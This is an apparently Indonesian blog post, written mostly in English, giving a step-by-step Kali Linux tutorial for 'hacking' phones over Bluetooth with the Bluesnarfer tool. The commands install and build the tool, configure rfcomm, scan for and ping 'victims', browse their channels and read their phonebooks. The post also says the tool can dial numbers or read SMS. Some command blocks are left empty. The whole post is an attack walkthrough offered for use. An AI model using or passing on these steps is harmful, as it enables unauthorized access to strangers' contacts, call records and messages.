.:-CARI-:.

Kamis, 17 Mei 2018

How to Hack hp with bluetooth => kalilinux (1)

First we must install Bluesnarfer Make your way to the opt directory
Code:

 cd /opt

Get Bluesnarfer using the wget command
Code:

Reopen the directory using the ls command and you will see Bluesnarfer in there, now we have to extract it.
Code

Code:
1. :/opt# ls
2. bluesnarfer.tar.gz  firmware-mod-kit  metasploit  Teeth


To extract we use the simple tar xvf command
Code:
/opt# tar xvf bluesnarfer.tar.gz


Reopen the directory once again and you will see Bluesnarfer there
Code:
/opt# ls
BFi13-dev-18  bluesnarfer.tar.gz  metasploi

bluesnarfer   firmware-mod-kit    Teeth



Lets enter that folder like so
Code:

/opt# cd bluesnarfer


Code again :

/opt/bluesnarfer# ls
include Makefile README src

Now we finish it off by compoling the install like this
Code:

/opt/bluesnarfer# make



To see all of the Bluesnarfer commands run this command ./bluesnarfer
Code:

:/opt/bluesnarfer# ./bluesnarfer


Now that we have Bluesnarfer, you must configure rfcomm first, if you havent already done that,
Code:
mkdir -p /dev/bluetooth/rfcomm



Code: ( ketik lagi )
mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0


Code:: (ketik lagi)
 mknod --mode=666 /dev/rfcomm0 c 216 0

Code:
hciconfig -i hci0 up

Code:
hciconfig hci0





(Scan for victims)
Code: 
hcitool scan hci0




(ping the vitcim to see if he is awake)
Code:
l2ping  < victim mac addr&gt



(browse the victim for rfcomm channels to connect to)
Code:
sdptool browse --tree --l2cap < mac addr >


(then you can use bluesnarfer for example to read the victims phonebook, dial a number or read Sms or other things.)

Code:
Bluesnarfer -r 1-100 -C 7 -b < mac addr >



(to see available opions to do )
Code:


(Dial number )
Code:


Extra: This is what the Bluesnarfer shell should look like
Code:
bluesnarfer, version 0.1 –
usage: bluesnarfer [options] [ATCMD] -b bt_addrATCMD     : valid AT+CMD (GSM EXTENSION)TYPE      : valid phonebook type ..
example   : “DC” (dialed call list)
“SM” (SIM phonebook)
“RC” (recevied call list)
“XX” much more-b bdaddr : bluetooth device address
-C chan   : bluetooth rfcomm channel-c ATCMD  : custom action
-r N-M    : read phonebook entry N to M
-w N-M    : delete phonebook entry N to M
-f name   : search “name” in phonebook address
-s TYPE   : select phonebook memory storage
-l      : list aviable phonebook memory storage
-i      : device info

Tidak ada komentar:

Posting Komentar